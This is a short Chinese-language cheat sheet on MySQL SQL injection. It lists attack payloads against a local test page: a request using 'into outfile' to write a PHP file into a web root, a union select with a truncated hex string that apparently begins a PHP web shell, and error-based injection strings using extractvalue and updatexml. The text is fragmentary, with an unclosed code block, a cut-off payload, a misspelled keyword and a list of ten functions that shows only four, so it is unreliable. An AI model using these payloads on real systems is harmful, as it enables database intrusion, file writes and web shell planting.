# SQL注入
## mysql 写文件
```
http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY ''
http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f706870207068
## 注入
### 报错注入函数(10种)
>
1.extractvalue
and extractvalue(1, concat(0x7e,(select @@version),0x7e))--
2.通过floor报错 向下取整
3.updatexml
and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4.geometry